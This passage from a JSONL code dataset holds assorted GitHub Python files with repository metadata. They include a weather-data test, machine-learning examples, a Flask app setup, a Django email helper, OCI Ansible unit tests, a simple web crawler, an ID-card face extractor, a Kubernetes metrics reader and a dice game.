def testFormatStationFilename(self):\n formatted_string = dwd.format_station_filename(\"00001\")\n self.assertEqual(\"tageswerte_KL_00001_\", formatted_string)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"Dens49/dwd-weather-stats","sub_path":"dwd_test.py","file_name":"dwd_test.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"18699581623","text":"from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.datasets import load_iris\n\ndata = load_iris().data\nmms_transfer = MinMaxScaler()\n\"\"\"\nNormalization formula: x' = (x-min) / (max-min)\n------------- Commonly used methods of a MinMaxScaler() object -------------\nfit(): fit the scaler on the data\nfit_transform(): runs fit first and then transform, i.e. returns the normalized data directly\n\n- After calling .fit(), the following can be used:\n.data_max_: the maximum value of every feature\n.data_min_: the minimum value of every feature\ntransform: normalize a dataset with the fitted scaler\nget_params: get the parameters of the scaler\ninverse_transform: inverse normalization, i.e. turn the normalized dataset back into its original, unprocessed form\n\"\"\"\nmms_transfer.fit(data) # fit the scaler on the data\nprint(f\"Maximum of every feature in the dataset: {mms_transfer.data_max_}\")\nprint(f\"Minimum of every feature in the dataset: {mms_transfer.data_min_}\")\nprint(f\"Parameters of the scaler: {mms_transfer.get_params()}\")\ndata_mms = mms_transfer.transform(data) # normalize the data with the fitted scaler\n\n# If you only need to normalize the data, the following steps are more concise:\nmms_transfer = MinMaxScaler()\ndata_transfer = mms_transfer.fit_transform(data) # fit the scaler and transform the data in one call\nprint(f\"Normalized data: {data_transfer}\")\n","repo_name":"Korcat/Machine_Learning","sub_path":"数据预处理/离差标准化.py","file_name":"离差标准化.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"23068109348","text":"import numpy as np\ndef shift(x, k, l, boundary):\n    if x.ndim == 2:\n        color = 1\n    else:\n        color = 3\n    n1 = np.shape(x)[0]\n    n2 = np.shape(x)[1]\n    xshifted = np.zeros((n1,n2,color))\n    irange = np.mod(np.arange(n1) + k, n1)\n    jrange = np.mod(np.arange(n2) + l, n2)\n    # firstly move upward then move rightward\n    xshifted = x[irange, :][:, jrange]\n    if boundary == 'periodical':\n        pass\n    elif boundary == 'extension':\n        m = n1 - k if k > 0 else -k-1\n        n = n2 - l if l > 0 else -l-1\n        if k != 0:\n            xshifted[m::np.sign(k),:,:] = np.tile(xshifted[m-np.sign(k):m-np.sign(k)+1,:,:],(np.sign(k)*k,1,1))\n        if l != 0:\n            xshifted[:,n::np.sign(l),:] = np.tile(xshifted[:,n-np.sign(l):n-np.sign(l)+1,:],(1,np.sign(l)*l,1))\n    elif boundary == 'zero-padding':\n        period = xshifted\n        xshifted = np.zeros_like(period)\n        m = n1 - k if k > 0 else -k-1\n        n = n2 - l if l > 0 else -l-1 \n        sign_k = np.sign(k) if k != 0 else 1 \n        sign_l = np.sign(l) if l != 0 else 1\n        if k == 0:\n            m = n1\n        if l == 0:\n            n = n2\n        xshifted[:m:sign_k,:n:sign_l,:] = period[:m:sign_k,:n:sign_l,:]\n    # mirror\n    else:\n        m = n1 - k if k > 0 else -k\n        n = n2 - l if l > 0 else -l\n        add_k = 1 if k < 0 else 0\n        add_l = 1 if l < 0 else 0\n        if k != 0:\n            xshifted[m::np.sign(k),:,:] = xshifted[min(m,m-k):max(m,m-k) + add_k,:,:][::-np.sign(k),:,:]\n        if l != 0:\n            xshifted[:,n::np.sign(l),:] = xshifted[:,min(n,n-l):max(n,n-l) + add_l ,:][:,::-np.sign(l),:]\n    return xshifted\n","repo_name":"shoachia/nlmeans","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"9158407173","text":"import os\nfrom pdfProcess import list_reform\nfrom pdfProcess import testclip\n\n\ndef zhihmulu2txt(path):\n    f = open(path+\"re.zhi2txt1\", encoding=\"utf-8\")\n    f2 = open(path+\"re.zhi2txt2\", \"w\", encoding=\"utf-8\")\n    linelist = f.readlines()\n    for line in linelist:\n        if line[0] == \"угг\":\n            f2.write(\"# \"+line+\"\\n\")\n        f2.write(line+\"\\n\")\n    f.close()\n    f2.close()\n\n\nif __name__ == '__main__':\n    path = 
os.getcwd()+\"/\"\n    testclip.copy_text_from_clip(path, \"zhi2txt1\")\n    zhihmulu2txt(path)\n","repo_name":"jiangnanqw12/testCode","sub_path":"004_text_process/zhi2txt.py","file_name":"zhi2txt.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"32813618881","text":"# Title : Coin 1\r\n# Category : DP, Gold 5\r\n# Source : Baekjoon Online Judge 2293\r\n\r\nn, k = map(int, input().split())\r\ncoin = [int(input()) for _ in range(n)]\r\n\r\ndp = [0] * (k+1)\r\ndp[0] = 1\r\n\r\nfor c in coin:\r\n    for i in range(c, k+1):\r\n        dp[i] += dp[i - c]\r\n\r\nprint(dp[k])","repo_name":"41ow1ives/1day2solve","sub_path":"kyounghyeon/BOJ/DP/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"42363016","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom app.auth.controllers import auth as auth_module, init_jwt\n\n# Define the WSGI application object\n\napp = Flask(__name__)\n\ndef setup_app(app):\n    CORS(app)\n\n    # Configurations\n    app.config.from_object('config')\n\n    # Sample HTTP error handling\n    @app.errorhandler(404)\n    def not_found(error):\n        return 'Not found', 404\n\n    # Register blueprint(s)\n    app.register_blueprint(auth_module)\n    init_jwt(app)\n\n","repo_name":"r3mariano/flask-cognito-auth-jwt","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26875804281","text":"import time\nimport logging\nimport datetime\nimport re\n\nimport html2text\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\n\nfrom djapp import models\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Email:\n    def __init__(self, key):\n        self.key = key\n\n    def _apply_whitelist(self, to):\n        whitelist = settings.EMAIL_WHITELIST\n        # Apply whitelist\n        if whitelist is not None:\n            whitelist = whitelist + ['@example.com']\n            l = []\n            for email in to:\n                for allowed_email in whitelist:\n                    if allowed_email == email or (allowed_email.startswith('@') and email.endswith(allowed_email)):\n                        l.append(email)\n                        break\n                else:\n                    logger.info('Skip mail %s: Not in whitelist', email)\n            to = l\n        return list(set(to))\n\n    def send(self, to, context, from_email=None):\n        if isinstance(to, str):\n            to = [to]\n\n        orig_to = to\n        to = self._apply_whitelist(to)\n        if not to:\n            logger.info('Nothing to send. 
To: before whitelist: %s', orig_to)\n return\n\n # render\n subject = self.render('emails/' + self.key + '_subject.html', context)\n subject = subject.replace('\\n', ' ').replace('\\r', ' ').strip()\n body_html = self.render('emails/' + self.key + '_body.html', context)\n body_text = html2text.html2text(body_html)\n\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=from_email,\n to=to,\n body=body_text,\n reply_to=['conseiller-numerique@anct.gouv.fr'],\n )\n msg.attach_alternative(body_html, 'text/html')\n logger.info('Send email to %s, from %r, key=%r, subject: %s', to, from_email, self.key, subject)\n msg.send()\n\n def render(self, template_name, context):\n return render_to_string(template_name, context)\n","repo_name":"anct-cnum/conseiller-numerique","sub_path":"back/djapp/utils/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38022626344","text":"import os.path\nimport random\nfrom urllib import parse\nfrom urllib import request\nfrom ua_info import ua_list\n\n\ndef get_url(word):\n query_string = {\n 'wd': word\n }\n\n url = \"http://www.baidu.com/s?{}\".format(parse.urlencode(query_string))\n return url\n\n\ndef request_url(url, fileName):\n headers = {\n 'User-Agent': random.sample(ua_list, 1)[0]\n }\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode('utf-8')\n with open(fileName, 'w', encoding='utf-8') as f:\n f.write(html)\n\n\ndef generateFileName(savePath, fileName):\n fileName = os.path.join(savePath, fileName + \".html\")\n return fileName\n\n\nif __name__ == \"__main__\":\n word = \"色图\"\n path = \"/Users/yifanhuang/PycharmProjects/pythonProject/crawler/tutorial/result\"\n request_url(get_url(word), generateFileName(path, \"result1.1\"))\n","repo_name":"yifanHuang129/Crawler_learning","sub_path":"exercise1.1.py","file_name":"exercise1.1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13279519459","text":"import pytest\nfrom nose.plugins.skip import SkipTest\nfrom ansible.module_utils import six\nfrom ansible.module_utils.oracle import oci_utils\nfrom ansible.modules.cloud.oracle import oci_app_catalog_subscription_facts\n\ntry:\n import oci\n from oci.util import to_dict\n from oci.core.models import AppCatalogSubscription\n from oci.exceptions import ServiceError\nexcept ImportError:\n raise SkipTest(\"test_oci_app_catalog_subscription_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n def __init__(self, **kwargs):\n self.params = kwargs\n\n def fail_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n raise Exception(kwargs[\"msg\"])\n\n def exit_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef compute_client(mocker):\n mock_compute_client = mocker.patch(\"oci.core.compute_client.ComputeClient\")\n return mock_compute_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n return mocker.patch.object(oci_utils, \"list_all_resources\")\n\n\n@pytest.fixture()\ndef call_with_backoff_patch(mocker):\n return mocker.patch.object(oci_utils, \"call_with_backoff\")\n\n\ndef get_app_catalog_subscription(**kwargs):\n app_catalog_subscription = AppCatalogSubscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n 
listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\",\n listing_resource_version=\"1.0\",\n )\n for attr, val in six.iteritems(kwargs):\n setattr(app_catalog_subscription, attr, val)\n return app_catalog_subscription\n\n\ndef get_app_catalog_subscriptions():\n return [\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx1\",\n listing_resource_version=\"1.0\",\n ),\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx2\",\n listing_resource_version=\"1.0\",\n ),\n ]\n\n\ndef get_module(**kwargs):\n params = {\"compartment_id\": \"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\"}\n params.update(kwargs)\n module = FakeModule(**params)\n return module\n\n\ndef get_response(status=200, headers=None, data=None, request=None):\n if not headers:\n headers = dict()\n return oci.Response(status, headers, data, request)\n\n\ndef test_list_app_catalog_subscriptions_raises_service_error(\n compute_client, list_all_resources_patch\n):\n list_all_resources_patch.side_effect = ServiceError(\n 500, \"InternalServerError\", dict(), \"Internal Server Error\"\n )\n with pytest.raises(ServiceError) as exc_info:\n oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, get_module()\n )\n se = exc_info.value\n assert se.status == 500\n assert se.code == \"InternalServerError\"\n assert se.message == \"Internal Server Error\"\n\n\ndef test_list_app_catalog_subscriptions_when_no_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n list_all_resources_patch.return_value = []\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 0\n\n\ndef test_list_app_catalog_subscriptions_when_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n app_catalog_subscriptions = get_app_catalog_subscriptions()\n list_all_resources_patch.return_value = app_catalog_subscriptions\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 2\n\n\ndef test_list_app_catalog_subscriptions_filter_by_listing_id(\n compute_client, list_all_resources_patch\n):\n listing_id = \"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\"\n module = get_module(listing_id=listing_id)\n app_catalog_subscription = get_app_catalog_subscription(listing_id=listing_id)\n list_all_resources_patch.return_value = [app_catalog_subscription]\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n assert len(result) == 1\n assert result[0][\"compartment_id\"] == app_catalog_subscription.compartment_id\n assert result[0][\"listing_id\"] == app_catalog_subscription.listing_id\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n listing_id=listing_id,\n 
)\n","repo_name":"oracle/oci-ansible-modules","sub_path":"test/units/test_oci_app_catalog_subscription_facts.py","file_name":"test_oci_app_catalog_subscription_facts.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"38"} +{"seq_id":"8699218791","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC, LinearSVC\nimport numpy as np\nfrom glob import glob\nimport os \nfrom sklearn.model_selection import KFold\nfrom torch import optim\nimport torch \nimport torchvision\nimport torch.nn as nn \nimport time\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\n\n\ndef evaluate_classifier(clf, X, y, folds=5):\n\t\"\"\"\n\t\tReturns the 5-fold accuracy for classifier clf on X and y\n\t\tArgs:\n\t\t\tclf (sklearn.base.BaseEstimator): classifier\n\t\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tReturns:\n\t\t\t(float): The 5-fold classification score (accuracy)\n\t\t\t\n\t\"\"\"\n\tscores = cross_val_score(clf, X, y,cv=KFold(n_splits=5),scoring=\"accuracy\", n_jobs=-1)\n\treturn np.mean(scores)\n\n\ndef calculate_priors(X, y):\n\t\"\"\"Return the a-priori probabilities for every class\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\tReturns:\n\t\t(np.ndarray): (n_classes) Prior probabilities for every class\n\t\"\"\"\n\toccurances = [0]*len(set(y))\n\tfor label in y :\n\t\toccurances[label]+=1\n\treturn np.asarray(list(map(lambda x: x/len(y),occurances)))\n\ndef gauss_prob(x,mean,var):\n\tif var==0:\n\t\tvar=1e-9\n\tprob = -( np.square(x-mean)/(2*var)) - 0.5*np.log(2*np.pi*var)\n\treturn prob\n \ndef digit_mean(X, y, digit):\n\t'''Calculates the mean for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The mean value of the digits for every pixel\n\t'''\n\n\tdigit_indices = []\n\tmean = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of all digit samples in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# save mean value of digit in mean \n\t\tmean.append(np.asarray(feature_values).mean())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(mean)\n \n\ndef digit_variance(X, y, digit):\n\t'''Calculates the variance for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The variance value of the digits for every pixel\n\t'''\n\tdigit_indices = []\n\tvariance = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of digit in order to calculate their mean value\n\t\tfor index in 
digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# append mean value of same feature of all digit samples in mean \n\t\tvariance.append(np.asarray(feature_values).var())\n\t\t\n\t\t#reset feature_values as empty list for next feature of digit \n\t\tfeature_values = []\n\n\treturn np.asarray(variance)\n\nclass CustomNBClassifier(BaseEstimator, ClassifierMixin):\n\t\"\"\"Custom implementation Naive Bayes classifier\"\"\"\n\n\tdef __init__(self, use_unit_variance=False):\n\t\tself.X_mean_ = None\n\t\tself.use_unit_variance = use_unit_variance\n\t\tself.X_var_= None\n\n\n\tdef fit(self, X, y):\n\t\t\"\"\"\n\t\tThis should fit classifier. All the \"work\" should be done here.\n\t\tCalculates self.X_mean_ based on the mean\n\t\tfeature values in X for each class.\n\t\tself.X_mean_ becomes a numpy.ndarray of shape\n\t\t(n_classes, n_features)\n\t\tfit always returns self.\n\t\t\"\"\"\n\t\tself.y=y\n\t\tself.X_mean_ = np.empty((len(set(y)),X.shape[1]))\n\t\tself.X_var_ = np.empty((len(set(y)),X.shape[1]))\n\n\t\tfor i in range(len(set(y))):\n\t\t\tself.X_mean_[i]=digit_mean(X,y,i)\n\t\t\tself.X_var_[i]=digit_variance(X,y,i)\n\t\t\n\t\t#If use_unit_variance is True set variance for all classes to one\n\t\tif self.use_unit_variance:\n\t\t\tself.X_var_ = np.ones((X.shape[0],X.shape[1]))\n\t\tself.apriori = np.log(calculate_priors(X,y))\n\n\t\treturn self\n\n\n\tdef predict(self, X):\n\t\t\"\"\"\n\t\tMake predictions for X based on the\n\t\teuclidean distance from self.X_mean_\n\t\t\"\"\"\n\t\tself.posterior = np.empty((len(set(self.y)),))\n\t\tself.predicts = np.empty((X.shape[0],),dtype=np.int64)\n\t\tfor i,feutures in enumerate(X):\n\t\t\tfor c in range(len(set(self.y))):\n\t\t\t\tself.posterior[c] =self.apriori[c] + np.sum([gauss_prob(a,self.X_mean_[c][feaut_num],self.X_var_[c][feaut_num]) for feaut_num,a in enumerate(feutures)]) \n\n\t\t\tself.predicts[i] = np.argmax(self.posterior)\n\t\treturn self.predicts\n\n\tdef score(self, X, y):\n\t\t\"\"\"\n\t\tReturn accuracy score on the predictions\n\t\tfor X based on ground truth y\n\t\t\"\"\"\n\t\treturn accuracy_score(np.asarray(self.predict(X)),y)\n\t","repo_name":"savassif/Pattern-Recognition-NTUA","sub_path":"2nd/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14891609557","text":"import cv2\r\n\r\nclass FaceExtraction:\r\n def face_extraction(self):\r\n # img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\aadharCard.png\")\r\n img = cv2.imread(\"D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\MiddleTier\\\\aadharCard.png\")\r\n # cv2.imshow(img)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n face_cascade = cv2.CascadeClassifier('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\haarcascade_frontalface_alt.xml')\r\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n faces = img[y:y + h, x:x + w]\r\n cv2.imshow(\"face\", faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\face.jpg', faces)\r\n cv2.imwrite('D:\\\\SPIT\\\\Semester 4\\\\Mini Project\\\\Wroking Module\\\\VerifyMe\\\\AadharCardProcessing\\\\Asset\\\\detcted.jpg', img)\r\n cv2.imshow('img', img)\r\n 
cv2.waitKey()","repo_name":"Shivam-Chaubey/autokyc","sub_path":"AadharCardProcessing/faceExtract.py","file_name":"faceExtract.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30510615826","text":"#\r\n# This file is part of Efforia project.\r\n#\r\n# Copyright (C) 2011-2013 William Oliveira de Lagos \r\n#\r\n# Efforia is free software: you can redistribute it and/or modify\r\n# it under the terms of the Lesser GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Efforia is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU Lesser General Public License\r\n# along with Efforia. If not, see .\r\n#\r\n\r\nfrom django import forms\r\nfrom crispy_forms.helper import FormHelper\r\nfrom crispy_forms.layout import Layout, Div, Hidden, HTML, Field\r\n\r\nclass PhotoForm(forms.Form):\r\n file = forms.FileField(label='')\r\n redirect = forms.CharField(label='')\r\n def __init__(self, *args, **kwargs):\r\n self.helper = FormHelper()\r\n self.helper.form_action = '/efforia/photo'\r\n self.helper.layout = Layout(\r\n Hidden('redirect',value='1'),\r\n Field('file',style='opacity:0; width:0; height:0',css_class='file'),\r\n Div(HTML(\"\"),css_class='upload')\r\n )\r\n super(PhotoForm, self).__init__(*args, **kwargs)\r\n","repo_name":"williamlagos/django-coding","sub_path":"pandora-hub/pandora/hub/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72901408430","text":"\nfrom kubernetes import client, config\nimport time\nimport pandas as pd\n\ndef metricsCpu():\n try:\n config.load_kube_config()\n api = client.CustomObjectsApi()\n cpu = 0\n memory = 0\n cpul =[]\n memoryl = []\n k8s_nodes = api.list_cluster_custom_object(\"metrics.k8s.io\", \"v1beta1\", \"pods\")\n for stats in k8s_nodes['items']:\n if 'nginx' in stats['metadata']['name']: \n #print(\"Node Name: %s\" % (stats['metadata']['name']))\n #print(stats)\n for c in stats['containers']:\n cpul.append(int(c['usage']['cpu'].split('n')[0])/1000000)\n # memoryl.append(int(c['usage']['memory'].split('Ki')[0])*1024/1048576)\n cpu += int(c['usage']['cpu'].split('n')[0])\n # memory += int(c['usage']['memory'].split('Ki')[0])\n # print(cpul,memoryl)\n print(\"CPU: %s\\t\" %(max(cpul)))\n return max(cpul),0\n except:\n return 0,0\n\nmetricsCpu()\n\n","repo_name":"dj5/Kubernetes_Vertical_Pod_Autoscaling_Using_RL","sub_path":"rl/cpumemory.py","file_name":"cpumemory.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29032024888","text":"import os\n\nfrom entity.humod import Humod as HumodEntity\n\nfrom ..model import Model\nfrom .load import load\n\n\nclass Humod(Model):\n def __init__(self):\n self.omname = \"humod\"\n self.imname = \"\"\n self.ometype = HumodEntity\n\n def dotransform(self, store):\n src = getattr(store.env, \"src\", None)\n ctx = {\n \"base\": getattr(store.env, \"base\", os.getcwd()),\n \"verbose\": getattr(store.env, \"verbose\", False),\n # \"imodel\": src,\n 
\"omodel\": store.models[\"humod\"],\n \"store\": store,\n }\n load(src, ctx)\n","repo_name":"masol/bot","sub_path":"src/trans/humod/humod.py","file_name":"humod.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29365474600","text":"import random\n\n\nclass Dado:\n def __init__(self, min_vel=1, max_vel=6):\n self.min = min_vel\n self.min_original = min_vel\n self.max = max_vel\n self.max_original = max_vel\n\n def jogar(self, n_dados=1, separado=False):\n # Joga os dados no tabuleiro, sorteando um número entre o máximo e mínimo\n # Sorteia quando vezes for solicitado\n # Pode devolver só a soma dos sorteios ou o resultado individual de cada\n numeros = []\n result = 0\n x = 0\n while x < n_dados:\n x += 1\n numeros.append(int(random.uniform(self.min, self.max)))\n for x in numeros:\n result += x\n if not separado:\n return result\n elif separado:\n return result, numeros\n\n def altera_min_max(self, min_vel=0, max_vel=6):\n # Altera valor mínimo e máximo das faces\n self.min = min_vel\n self.max = max_vel\n\n def reseta_valores(self):\n # Reseta para valoeres originais\n self.min = self.min_original\n self.max = self.max_original\n\n\nclass Interacao:\n def __init__(self, dado_obj):\n self.dado = dado_obj\n self.individual = False\n\n def init(self):\n # Ao Iniciar o programa\n print('********************')\n print('*****DadoSystem*****')\n print('********************')\n print('Olá, bem vindo!')\n\n def tratar(self, string):\n # Tenta tranformar string em um inteiro, ou deixa a string toda e low\n result = string.lower()\n try:\n result = int(string)\n finally:\n return result\n\n def print_config_alteracao(self):\n # Print a explicação de como fazer a alteração dos valoeres mínimos e máximos dos dados\n print(\"-Em caso de dois valores separados por um espaço (' ') \"\n \"o primeiro será o valor mínimo e p segundo o valor máximo;\")\n print(\"-Em caso de um único valor, esse valor será inválido;\")\n print(\n f\"-Para alterar o valor máximo, coloque {self.dado.min} \"\n f\"(que é o atual valor mínimo), espaço e o novo valor máximo;\")\n print(\n f\"-Para alterar o valor mínimo, coloque o novo valor mínimo, espaço e {self.dado.max} \"\n f\"(que é o atual valor máximo);\")\n print(\"-Outras entradas são inválidas.\\n\")\n self.alterar_max_min()\n\n def alterar_max_min(self):\n # Altera valor mínimo e máximo das faces do dado\n result = input('Qual os valores? (e para explicação):')\n result = result.lower()\n if result == 'e':\n self.print_config_alteracao()\n else:\n result = result.split()\n result_tratado = []\n for x in result:\n x = self.tratar(x)\n if isinstance(x, int):\n result_tratado.append(x)\n else:\n result_tratado = 'Iválido'\n if result_tratado == 'Inválido':\n print('Inválido')\n else:\n min_vel, max_vel = self.desempacotar_alteracoes(result_tratado)\n self.dado.altera_min_max(min_vel, max_vel)\n print(f'Novo mínimo {self.dado.min}')\n print(f'Novo máximo {self.dado.max}')\n\n def desempacotar_alteracoes(self, vel):\n # Tenta desempacotar os valores alterados\n vel_1, vel_2 = 0, 0\n try:\n vel_1, vel_2 = vel\n except:\n print('Valore inválidos, operação falhou. 
Os valores foram resetados.')\n vel_1, vel_2 = self.dado.min_original, self.dado.max_original\n finally:\n return vel_1, vel_2\n\n def alterar_individual(self):\n # Altera se os valores viram separador ou não\n if not self.individual:\n self.individual = True\n print('Alteração realizada, agora você vera todos os resultados individuais.')\n elif self.individual:\n self.individual = False\n print('Alteração realizada, agora você não vera todos os resultados individuais.')\n\n def comandos(self):\n # Printa os comando disponíveis\n print(\"'' ou 'j' para Jogo simples;\")\n print(\"Número x para Jogar x vezes o dado;\")\n print(\"'a' para alterar máximo e mínimo dos valores das faces do dado;\")\n print(\"'i' para alterar se você quer ou não os valores individuais de cada jogada no tabuleiro;\")\n print(\"'e' para sair;\")\n print(\"'c' para ver os comandos.\")\n self.entrada_usuario()\n\n def entrada_usuario(self):\n # Faz a entrada do usuário, aceita comandos\n answer = input(\"Deseja jogar os dados ou alterar o valores?: \\n('c' para ver comandos)\\n\")\n answer = self.tratar(answer)\n\n if answer == \"\" or answer == \"j\" or answer == ' ':\n result = self.dado.jogar(separado=self.individual)\n return result\n elif isinstance(answer, int):\n result = self.dado.jogar(n_dados=answer, separado=self.individual)\n return result\n elif answer == 'a':\n self.alterar_max_min()\n elif answer == \"e\":\n return False\n elif answer == 'i':\n self.alterar_individual()\n elif answer == 'c':\n self.comandos()\n else:\n print('Não entendi.')\n\n\nif __name__ == '__main__':\n dado = Dado()\n inter = Interacao(dado)\n inter.init()\n\n while True:\n play = inter.entrada_usuario()\n if play is None:\n pass\n elif play is False:\n break\n else:\n print(f'Os dados deram {play}')\n","repo_name":"RafaelKC/Dados_de_Tabuleiro","sub_path":"dados_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"27599414435","text":"#!/usr/bin/env python3.6\n\n# Applies Radiometric Calibration and Terrain Correction using ESA SNAP python wrapper to a single GRD product\n\nimport os\nimport re\nimport gc\nimport shutil\nimport argparse\nimport zipfile\nimport fiona\nimport shapely.geometry\nimport snappy\nfrom snappy import ProductIO\nfrom snappy import HashMap\nfrom snappy import GPF\n\nallowed_polarizations = ['HH', 'HV', 'VH', 'VV']\n\ndef main(infolder=False, outfolder=False, polarization=False, basename=False,\n wktstring=False, shapefile=False, 